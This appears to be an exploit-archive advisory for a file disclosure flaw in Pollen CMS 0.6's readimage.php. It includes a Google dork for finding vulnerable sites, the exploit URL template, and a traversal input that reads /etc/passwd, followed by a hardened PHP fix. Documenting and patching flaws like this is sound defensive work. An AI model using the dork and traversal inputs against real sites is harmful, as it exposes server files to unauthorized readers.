Pollen CMS 0.6 File Disclosure

2013.04.02
Credit: MizoZ
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Title: Pollen CMS <= 0.6 - Local File Disclosure
# Google Dork: intext:"Powered by Pollen CMS"
# Date: 25 March 2013
# Exploit Author: MizoZ
# Vendor Homepage: pollencms.com (BROKEN)
# Software Link: https://code.google.com/p/pollencms/
# Version: 0.6
# Tested on: Ubuntu Desktop 12.04

-- File "[path]/core/lib/readimage.php"

$image=urldecode($_GET["image"]);
if(is_file($image)){
    header("Pragma: no-cache");
    header("Expires: 0");
    header("Last-Modified: " . gmdate("D, d M Y H:i:s") . " GMT");
    header("Cache-Control: no-cache, must-revalidate");
    header("Content-type: image/jpg");
    readfile($image);
}else{
    header("HTTP/1.0 404 Not Found");
}

-- Problem
The script only verifies that the given file exists: the URL-decoded, user-controlled path is passed straight to readfile() without being restricted to an image directory, so any file readable by the web server can be disclosed.

-- Exploit
http://[ws]/[path]/core/lib/readimage.php?image=[LFI]
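A hardened replacement for the readimage.php logic above, written here as an added example rather than Pollen CMS code: the request is reduced to a bare file name, resolved inside a single image directory, and served only when its real content type is an image. The IMAGE_DIR location and the ALLOWED_MIME list are assumptions for this illustration.

```php
<?php
// Added example, not part of Pollen CMS. Assumed layout: images live in
// [path]/images, two levels above this file (adjust IMAGE_DIR as needed).
const IMAGE_DIR = __DIR__ . '/../../images';
const ALLOWED_MIME = ['image/jpeg', 'image/png', 'image/gif'];

/**
 * Resolve a requested image name to a real file inside $baseDir.
 * Returns null whenever the request cannot be proven to stay inside it.
 */
function resolve_image(string $requested, string $baseDir): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null;
    }
    // PHP has already URL-decoded $_GET values; decoding again (as the
    // original does) only helps smuggle "%252e%252e/" style sequences.
    // Keep just the file name so directory components are dropped entirely.
    $candidate = realpath($base . DIRECTORY_SEPARATOR . basename($requested));
    if ($candidate === false || !is_file($candidate)) {
        return null;
    }
    // Canonical path must still be under the image directory (symlinks included).
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($candidate, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $candidate;
}

$image = resolve_image($_GET['image'] ?? '', IMAGE_DIR);
// Content type comes from the bytes on disk, not from the client or extension.
$mime = $image === null ? null : (new finfo(FILEINFO_MIME_TYPE))->file($image);

if ($image === null || !in_array($mime, ALLOWED_MIME, true)) {
    header('HTTP/1.0 404 Not Found');
    exit;
}
header('Cache-Control: no-cache, must-revalidate');
header('Content-Type: ' . $mime);
header('Content-Length: ' . filesize($image));
readfile($image);
```

With this check, a request such as image=../../../../etc/passwd resolves to IMAGE_DIR/passwd, which does not exist, and is answered with 404 instead of the file contents.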

References:

https://code.google.com/p/pollencms/


Copyright 2024, cxsecurity.com